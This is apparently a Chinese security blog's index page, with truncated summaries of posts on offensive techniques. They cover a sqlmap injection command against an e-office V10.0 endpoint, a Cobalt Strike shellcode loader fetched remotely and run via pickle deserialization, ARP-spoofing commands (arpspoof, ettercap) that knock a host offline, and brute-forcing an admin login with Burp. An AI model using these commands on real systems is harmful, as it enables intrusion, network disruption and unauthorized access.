摘要：漏洞存在的版本： V10.0-20200421 漏洞验证： 注入点位置： python sqlmap.py -u "http://127.0.0.1:8010/eoffice10/server/ext/system_support/leave_record.php?flow_id=1&run_id= 阅读全文

摘要：使用CS里面生成payload，选择python 勾选64位。 将shellcode代码编码成BASE64 放在远程服务器上 反序列化代码 import pickle import base64 shellcode = """ import ctypes,urllib.request,codecs, 阅读全文

摘要：命令： arpspoof -i eth0 -t 192.168.1.12 192.168.1.1 OK，就挂了。 阅读全文

摘要：环境：kali2.0 kali-linux-2018.2-i386.iso 工具： arpspoof ARP断网工具 ettercap ARP欺骗工具 driftnet 图片劫持 实现ARP断网攻击： ifconfig //获取网卡信息 fping -asg 192.168.1.1/24 //获取局 阅读全文

摘要：该忙的忙完了，接下来就是学习划水等过年了，然后逛了逛SRC，准备挖一下京东的。 开始信息收集：我giao，京东金融的设计都是这种水平嘛？？ 一眼就看出假货。注册了一个账户登入。 就很棒，好像是个诈骗的网站。扫了一扫目录，发现后台admin 试了弱口令没有结果，丢到burp去爆破后获取到账号admin 阅读全文